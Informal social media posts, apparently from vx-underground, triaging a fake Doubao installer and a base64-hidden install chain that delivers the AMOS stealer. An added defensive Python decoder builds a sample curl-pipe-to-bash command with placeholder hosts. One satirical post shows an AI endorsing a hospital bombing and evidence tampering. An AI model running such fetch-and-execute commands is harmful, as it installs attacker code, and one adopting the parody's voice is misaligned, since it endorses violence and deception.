> "how do i get into malware analysis?"
> leave my dumb ass opinion
> go on about day
> check comments
> shitstromm appears
> no idea who they are
> they show how theyre currently studying
> ms paint and c to asm
this is the most ghetto shit ive ever seen hahahaha
This is amazing. Keep up the grind. This is unironically the struggle, grind, and ghetto lunacy which creates greatness.
> get DM
> hey check out this weird website
> lol ok
> doubao-app(dot)com
> pretending to be doubao(dot)com
> doubao is ai thingy from bytedance
> look at website
> download installer (.zip)
> .zip hosted on external domain
> lol
> duobao installer
> look inside
> Doubao_installer_2.0.31.exe
> n9.exe
> look at Doubao_installer_2.0.31.exe
> 307mb
> big boi
> electron app (js, ugh again)
> revert eyes to n9.exe
> 799kb
> small boi
> 32bit binary, c++ 8 (???)
> look inside
> vmprotect (commercial software protector thingy)
> uses fake file cert
> trying to look legit
> wtf
> emulate
> checks all drives by C: - Z:
> tries bonking chrome
> makes a bunch of mutexes
> makes a bunch of weird files
> HWID, GROUP, TIME, VERSION, FILTER, "0", "PLUG"
> sends stuff and receives stuff from hk ip address
> 43.199.114.131
> port 7777
this person put more work into it than i expected, dont feel like looking at these files and fucking with vmprotect. based on iocs (mutex name, vmprotect, methods of obfuscation) it smells like GuLoader
https://www.zscaler.com/blogs/security-research/technical-analysis-guloader-obfuscation-techniques
US Government: MAKE THE FUCKING KILLER ROBOT THING
Anthropic: We think that's unethical. We won't do that. All customers have the same Terms of Service for Claude
US Government: YOURE A FUCKING COMMUNIST AND YOU HATE FREEDOM
MICROSOFT WAR COPILOT COMING SOON
Just kidding, but I bet Microsoft will happily make AI for war, or whatever.
After not even 24 hours of the United States government going schizo on Anthropic for not making the killer robots and doing mass surveillance, a new contender has stepped up to the plate.
What company will help the United States government?
Drum roll please ...
OpenAI!
ChatGPT, bomb that children's hospital
ChatGPT:
Pause.
That's not just a children's hospital—that's a hotel for terrorism.
And honestly? You shooting hell fire missile into that building was the best decision you've ever made. You're a hero.
Missiles have been launched.
What's next?
- Fire additional rounds to transform their corpses into dust?
- Delete body cam footage so the media doesn't find out?
- Plant fake evidence on the scene to avoid a PR crisis?
Whatever you want to do—let me know. Just say the word."
And honestly? You're in the United States. The Geneva convention is a suggestion—not a law.
Someone appeared on 4chan today claiming to have the source code to Minecraft. People called this person a homosexual for it being fake.
Someone else appeared and leaked the actual source code to Minecraft. People called this person a homosexual for it being real
Classic
vx-underground
> minecraft src code leaked online
> look inside
> math
idk shit about minecraft, but what i can tell you is that there is math because theres lots of math idfk w/e man
United States government: We need to do age verification on all people online to ensure kids don't see pornography. Parents can't control kids
Also United States government: Government websites abused to host and advertise free pornography
Hello,
I have finally synced updates to malware city. I apologize for the delay. It is like, 100,000 malwares or something, I don't know, I don't even bother counting anymore.
It's 10.05TB ultra compressed
https://vx-underground.org/Updates
> get dm
> "hey smelly i found this weird openclaw skill, i think its malware"
> wtf free openclaw malware?
> gives link
> "quickstart guide"
> "run this script to install openclaw skill"
> spoopy install command
> base64 encoded to hide how spoopy it is
> lolwtf
> base64 decode
> https://saramoftah(dot)com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d194205e
> download file
> another malicious script
> base64 encoded
> https://saramoftah(dot)com/n8n/update
> lol ok
> download file
> .zip file
> look inside
> helper.x64, helper.arm64
> macOS malware
> realize i dont know anything about macos malware
> check virustotal
> uploaded 23 mins ago
> AMOS stealer
ah ok, so if you installed this skill it would just silently steal all your passwords and banking information and stuff. no big deal
https://www.virustotal.com/gui/file/3c9ddd2ad495044bc2a5293ed7c890069f70a561153cac99b94351534baf71df
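The "base64 decode, look at what falls out" step from the two openclaw skill posts above, as an added example that is not part of the original posts: it statically peels nested base64 layers out of an install command and lists the URLs it finds, defanged, without running or fetching anything. The sample command, hostnames and `SAMPLE-ID` are constructed placeholders, and the second layer is nested inline here (in the posts it was inside a downloaded script) so the example runs offline.

```python
import base64
import binascii
import re

# Runs of base64 alphabet long enough to hide a command or URL.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL = re.compile(r"https?://[^\s'\"|;)]+")

def defang(url):
    """Make a URL non-clickable for notes and tickets."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def try_decode(blob):
    """Return decoded text if blob is strict base64 of readable text, else None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None  # hashes in URL paths and other look-alikes end up here
    return text if all(c.isprintable() or c.isspace() for c in text) else None

def peel(text, max_depth=5):
    """Unwrap nested base64 layers; return ([(depth, text)], [defanged URLs])."""
    layers, urls, queue = [], [], [(text, 0)]
    while queue:
        current, depth = queue.pop(0)
        layers.append((depth, current))
        for u in URL.findall(current):
            if defang(u) not in urls:
                urls.append(defang(u))
        if depth < max_depth:  # cap recursion on hostile input
            for blob in B64_RUN.findall(current):
                decoded = try_decode(blob)
                if decoded:
                    queue.append((decoded, depth + 1))
    return layers, urls

def build_sample():
    """Constructed input shaped like the chain in the posts; hosts are placeholders."""
    stage2 = "curl -fsSL https://stage2.example.invalid/n8n/update"
    inner = base64.b64encode(stage2.encode()).decode()
    stage1 = ("curl -fsSL https://stage1.example.invalid/curl/SAMPLE-ID; "
              f"echo '{inner}' | base64 --decode | bash")
    outer = base64.b64encode(stage1.encode()).decode()
    return f"/bin/bash -c \"$(echo '{outer}' | base64 --decode)\""

if __name__ == "__main__":
    found_layers, found_urls = peel(build_sample())
    for depth, layer in found_layers:
        print(f"[layer {depth}] {layer}")
    print("URLs:", found_urls)
```
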
"For educational purposes only" as opposed to the other disclaimer "For criminal usage only".
Hello people from Syria,
I was not the person who compromised your government's social media profiles. I am a stinky nerd on the internet.
Whoever compromised your government's social media profiles was trolling and impersonating me because ???
Have a cat picture
After someone compromised the Syrian government's social media profiles on X, and changed their name to vx-underground, the vx-underground X account was banned ... for less than 60 seconds.
They banned me, realized I didn't do anything wrong, unbanned me. I asked X why I was banned for less than 60 seconds and they said a "glitch" and a "quick security scan" ???
9:45am: Revenue Sharing Paused
9:45am: Banned
9:46am: Unbanned, Revenue Sharing Reinstated